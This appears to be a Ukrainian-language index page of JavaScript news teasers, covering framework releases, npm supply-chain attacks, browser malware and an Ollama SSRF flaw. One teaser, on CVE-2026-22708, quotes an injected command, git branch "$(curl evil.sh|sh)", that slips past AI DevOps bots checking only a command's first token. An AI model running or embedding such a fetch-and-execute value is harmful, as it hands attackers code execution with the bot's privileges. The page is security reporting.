GyaanSetu JavaScript

Екосистема JavaScript та TypeScript.

100 articlesDeep, practical knowledge

ШІ-інструменти ‘Pi’ та ‘Tardis’ дозволили Shopify відмовитися від React Native після шести років використання

Shopify розробила двох внутрішніх ШІ-агентів — Pi для мапінгу функцій та Tardis для налагодження в реальному часі — щоб автоматизувати переписування коду. Це дозволило компанії відмовитися від стека React Native, який використовувався протягом шести років, пришвидшивши запуск додатка на 2 секунди, зменшивши його розмір на 109 МБ та скоротивши кількість збоїв приблизно в десять разів.

JavaScript · 2 min read

Promise.withResolvers у Node 22 скорочує цикли інструментів Claude вдвічі

Замінюючи громіздкий патерн `new Promise` одним викликом `Promise.withResolvers()`, розробники можуть передавати функції resolve/reject у будь-яку частину системи, усуваючи забуті resolve, попередження про подвійний reject та глибоку вкладеність — що особливо цінно в serverless-середовищах Lambda.

JavaScript · 4 min read

Pocket-35B від VIDRAFT працює на будь-якому процесорі ноутбука та досяг 1 мільйона завантажень

Ваги Pocket-35B у форматі GGUF завантажуються безпосередньо в llama.cpp або Ollama, що дозволяє командам без бюджету на GPU запускати модель із 35 мільярдами параметрів на звичайному ноутбуці — за умови відповідності скромним вимогам до обсягу оперативної пам'яті.

JavaScript · 3 min read

Чому ваш кастомний HTML5-плеєр вилітає під час кастингу: 4 приховані пастки

Під час кастингу відтворення передається прошивці телевізора, тому токени мають залишатися дійсними після завершення сесії, заголовки CORS повинні включати origin телевізора, а URL потоку не може бути blob-об'єктом. У посібнику показано, як перейти на URL маніфесту та перевірити з'єднання.

JavaScript · 3 min read

Як текстовий lockfile у Bun зменшує ризики в ланцюгу постачання завдяки скануванню політик у CI

Новий lockfile за замовчуванням у Bun v1.2 — це текстовий bun.lock, що замінює непрозорий bun.lockb. Ця зміна дозволяє рецензентам бачити точні зміни версій, виконувати перевірки політик у CI та відстежувати шкідливі вставки за допомогою стандартних інструментів git.

JavaScript · 1 min read

Шкідливе ПЗ JSCeal викрадає OAuth-токени Chrome та обходить двофакторну автентифікацію Google для криптотрейдерів

Корисне навантаження JSCeal, що працює лише в оперативній пам'яті, витягує файли cookie, збережені паролі та OAuth-токени з браузерів Chromium, а потім повторно використовує сесії для обходу запиту двофакторної автентифікації Google, що дозволяє зловмисникам заволодіти коштами на Binance, Bybit, Ledger та інших платформах.

JavaScript · 2 min read

13 підроблених Coinbase Wallet SDK затопили реєстр npm за 48 секунд

Пакети, опубліковані між 04:54:59 та 04:55:48 UTC 7 вересня 2026 року, імітували @coinbase/wallet-sdk під назвами на кшталт cb-wallet-http і використовували версію 0.0.1-security, що демонструє, наскільки швидко шкідливий код може проникнути в проєкти.

JavaScript · 2 min read

ClickFix перехоплює криптовалютні депозити безпосередньо з браузерів за допомогою Tampermonkey

Cisco Talos виявила ClickFix — схему крипто-скімінгу, яка обманює користувачів, змушуючи їх встановлювати скрипт Tampermonkey. Скрипт у реальному часі підміняє адреси для депозитів, викрадаючи кошти, поки транзакція виглядає легітимною.

JavaScript · 2 min read

Лише 2 з 13 діапазонів Semver працюють однаково в npm, Cargo, Composer та pip

Тестування 13 виразів діапазонів на 19 номерах версій виявило лише 17 збігів, більшість із яких — відхилення. Символи caret, tilde та dot-x інтерпретуються кожним менеджером по-різному, що призводить до неочікуваної несумісності.

JavaScript · 2 min read

Завантажувач моделей Ollama дозволяє неавтентифікованим зловмисникам викрадати хмарні метадані через SSRF

Помилка SSRF зберігається в Ollama 0.33.2, оскільки завантажувач тензорних моделей використовує окремий HTTP-клієнт, який ігнорує захист від перенаправлень, впроваджений для CVE-2026-5530, що дозволяє зловмисникам перенаправляти завантаження на будь-яку доступну адресу.

JavaScript · 3 min read

Вразливість DevOps-ботів на базі ШІ: білі списки префіксів дозволяють зловмисникам виконувати довільний код

CVE-2026-22708 демонструє, що агентів, які перевіряють лише перший токен команди, можна обдурити за допомогою шкідливого коду, прихованого в аргументах — наприклад, git branch "$(curl evil.sh|sh)"—, що надає зловмисникам ті ж привілеї, що й боту автоматизації.

JavaScript · 4 min read

Anthropic знижує вартість Claude Fable 5.1 на 45% для повторюваних циклів агентів

Знижка 45% діє за умови повторного використання однакових системних промптів та схем інструментів протягом багатьох ітерацій, що робить Claude Fable 5.1 особливо вигідним для автономних рецензентів коду, ботів для сортування тікетів та інших повторюваних агентських пайплайнів.

JavaScript · 3 min read

WebFPGA забезпечує виведення TinyML за 4 мс при 30 мВт — дані не покидають браузер

WebFPGA використовує WebUSB API для програмування FPGA Lattice iCE40-UP5K за допомогою JavaScript, що дозволяє виконувати виведення TinyML швидше ніж за 10 мс, споживаючи лише кілька десятків міліватів і зберігаючи всі дані на пристрої.

JavaScript · 2 min read

Витік ключів Stripe дозволяє здійснювати шахрайські списання та красти дані клієнтів у 669 постачальників

Викриті ключі дозволяють зловмисникам створювати платежі, отримувати рахунки та збирати персональні дані, що загрожує чарджбеками, штрафами та репутаційними втратами для бренду. Негайні заходи включають блокування dotfiles, ротацію всіх ключів та перенесення секретів у сховище.

JavaScript · 4 min read

LibreOffice 26.8 представляє дорожню карту з пріоритетом на конфіденційність, уникаючи хмарних запитів до ШІ

Новий реліз покращує форматування абзаців для складних скриптів, додає спрощений режим чернетки та вдосконалює конвертацію ODF у DOCX/XLSX, тоді як патчі безпеки та ізоляція макросів у «пісочниці» забезпечують безпеку документів локально.

JavaScript · 2 min read

Vapor Mode у Vue 3.6 відмовляється від Virtual DOM і підвищує продуктивність ігор

Майбутній Vapor Mode у Vue 3.6 перетворює однофайлові компоненти на прямі виклики DOM, усуваючи етап порівняння (diffing) virtual DOM. У тестових іграх, що потребують перемальовування десятки разів на секунду, ця зміна скорочує час рендерингу та зменшує розмір бандлів, хоча для інтерфейсів із низькою частотою оновлення приріст буде незначним.

JavaScript · 4 min read

Next.js 16.3 робить Turbopack стабільним, скорочуючи час збірки у 2-5 разів для застосунків середнього розміру

Реліз також приносить готовий до продакшену Partial Prerendering, що дозволяє скоротити Time to Interactive на 40-60%, покращену підтримку TypeScript для Server Actions та middleware на базі Rust, проте він потребує Node 20+ і може порушити роботу існуючих плагінів Webpack.

JavaScript · 3 min read

TanStack Table v9 зменшує розмір бандла до ~5 КБ завдяки опціональним функціям

Нова бета-версія дозволяє імпортувати лише ті можливості сітки, які ви використовуєте: можна повністю пропустити код сортування, зменшити обсяг завантаження приблизно до 5 КБ та уникнути навантаження на головний потік, що раніше сповільнювало показники INP.

JavaScript · 2 min read

Опанування просунутого кешування на стороні сервера в Next.js

Опанування просунутого кешування на стороні сервера в Next.js. Масштабування додатка Next.js потребує більшого, ніж просто вибір між SSR та SSG. Зі зростанням обсягів даних вам знадобиться просунуте кешування, щоб зменш...

JavaScript · 3 min read